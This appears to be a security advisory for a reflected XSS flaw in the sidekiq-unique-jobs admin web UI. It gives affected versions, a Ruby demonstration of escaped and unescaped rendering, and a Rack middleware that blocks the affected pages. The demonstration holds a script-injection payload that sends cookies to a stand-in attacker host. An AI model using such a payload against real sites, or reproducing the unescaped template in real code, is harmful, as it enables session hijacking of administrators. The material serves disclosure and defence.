Unknown · Sidekiq-Unique-Jobs · CVE-2024-25122
**Name of the Vulnerable Software and Affected Versions**
sidekiq-unique-jobs 7.x releases before 7.1.33 and 8.x releases before 8.0.7
**Description**
The sidekiq-unique-jobs "admin" web UI (the pages the gem adds to the Sidekiq Web interface) has a cross-site scripting (XSS) vulnerability. Specially crafted GET request parameters handled by the "/changelogs", "/locks" and "/expiring_locks" endpoints are reflected into the rendered page, so a super-user attacker, or an unwitting authorized victim who follows a crafted link, can be made to execute attacker-supplied script in the context of the admin UI. That script runs with the victim's session and can read cookies, session data or local storage, or perform any action the UI exposes as that user. Because sidekiq-unique-jobs is widely deployed, the number of affected sites is potentially large.
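As an added illustration of the bug class (this is not sidekiq-unique-jobs code, and the `filter` parameter name and the input template are assumptions made for the example), the Ruby snippet below renders a GET parameter into an HTML attribute two ways: verbatim, which lets a crafted query string inject a script tag, and through `ERB::Util.html_escape`, which neutralises it. The attacker query string is constructed inline.

```ruby
# Added example of the reflected-XSS bug class the advisory describes.
# Not sidekiq-unique-jobs code: the "filter" parameter and the template are
# assumptions made for this illustration.
require "erb"
require "uri"

# Vulnerable: the query parameter is interpolated into an HTML attribute verbatim.
VULNERABLE_TEMPLATE = ERB.new('<input type="text" name="filter" value="<%= filter %>">')

# Hardened: identical markup, but the value is HTML-escaped before insertion.
SAFE_TEMPLATE = ERB.new('<input type="text" name="filter" value="<%= ERB::Util.html_escape(filter) %>">')

# Parse a raw GET query string (what Rack exposes as QUERY_STRING) into a Hash.
def parse_query(query_string)
  URI.decode_www_form(query_string).to_h
end

# Render the "filter" parameter of a query string with the chosen template.
def render_filter_input(query_string, escaped:)
  params = parse_query(query_string)
  template = escaped ? SAFE_TEMPLATE : VULNERABLE_TEMPLATE
  template.result_with_hash(filter: params.fetch("filter", ""))
end

# Constructed attacker payload: closes the value attribute and injects a script
# that sends the victim's cookies to an attacker-controlled host.
PAYLOAD = %q{"><script>location="https://attacker.example/?c="+document.cookie</script>}
ATTACK_QUERY = URI.encode_www_form(filter: PAYLOAD)

# True when the rendered HTML still contains a live <script> tag.
def script_injected?(html)
  html.include?("<script>")
end

if $PROGRAM_NAME == __FILE__
  puts render_filter_input(ATTACK_QUERY, escaped: false)
  puts render_filter_input(ATTACK_QUERY, escaped: true)
end
```

The unescaped rendering emits `"><script>...` inside the markup, so the browser closes the `value` attribute and runs the payload; the escaped rendering emits `&quot;&gt;&lt;script&gt;...`, which the browser treats as text. Note that the cookie theft only succeeds for cookies without the `HttpOnly` flag; the script can still drive the UI as the victim either way.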
**Recommendations**
To resolve the issue, upgrade to version 7.1.33 (7.x series) or 8.0.7 (8.x series).
As a temporary workaround until the upgrade can be applied, restrict access to the vulnerable endpoints "/changelogs", "/locks" and "/expiring_locks", for example by rejecting requests to those paths before they reach the admin UI.
Additionally, place the Sidekiq Web UI that hosts these pages behind authentication and authorization so that only trusted administrators can reach it. This reduces exposure, but it does not by itself stop a reflected XSS delivered to an authorized user through a crafted link, so it complements rather than replaces the upgrade or the endpoint restriction.
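The endpoint restriction described above, as an added Ruby example that is not part of sidekiq-unique-jobs or Sidekiq: a Rack middleware that answers 403 for the three pages (and anything nested under them) and passes every other request through. It assumes the pages are mounted at exactly these paths under Sidekiq::Web, with the third route spelled `/expiring_locks`; the class name and the downstream stand-in app are constructed for the example.

```ruby
# Added example: a Rack middleware that denies the three pages the advisory
# names until the upgrade is applied. It is not part of sidekiq-unique-jobs;
# the class name and the assumption that the routes live at exactly these
# paths (with "/expiring_locks" as the underscore form) are this example's own.
class BlockUniqueJobsPages
  BLOCKED = %w[/changelogs /locks /expiring_locks].freeze

  def initialize(app)
    @app = app
  end

  # Rack entry point: deny the blocked pages, otherwise delegate downstream.
  def call(env)
    path = env.fetch("PATH_INFO", "")
    if blocked?(path)
      body = "Forbidden: page disabled pending sidekiq-unique-jobs upgrade\n"
      return [403, { "content-type" => "text/plain", "content-length" => body.bytesize.to_s }, [body]]
    end
    @app.call(env)
  end

  # Match the page itself and anything nested under it (e.g. /locks/<digest>),
  # but not unrelated pages that merely share a prefix (e.g. /locksmith).
  def blocked?(path)
    BLOCKED.any? { |page| path == page || path.start_with?("#{page}/") }
  end
end

# Constructed downstream app standing in for Sidekiq::Web in this example.
UPSTREAM = ->(_env) { [200, { "content-type" => "text/plain" }, ["ok\n"]] }
APP = BlockUniqueJobsPages.new(UPSTREAM)

# Drive the middleware with a minimal Rack env for a GET request and return the status.
def get_status(path, query = "")
  status, _headers, _body = APP.call(
    "REQUEST_METHOD" => "GET",
    "PATH_INFO" => path,
    "QUERY_STRING" => query
  )
  status
end

if $PROGRAM_NAME == __FILE__
  %w[/ /locks /expiring_locks /changelogs/2024 /locksmith].each do |path|
    puts "#{path} -> #{get_status(path)}"
  end
end
```

Sidekiq::Web is a Rack application and accepts middleware through `Sidekiq::Web.use`, so `Sidekiq::Web.use BlockUniqueJobsPages` in an initializer applies the block before the mounted routes see the request; remove it once the upgraded gem is deployed. Because the advisory's attack works against an authorized victim who follows a crafted link, authentication on the UI alone does not close the hole, which is why the pages are blocked outright rather than merely gated.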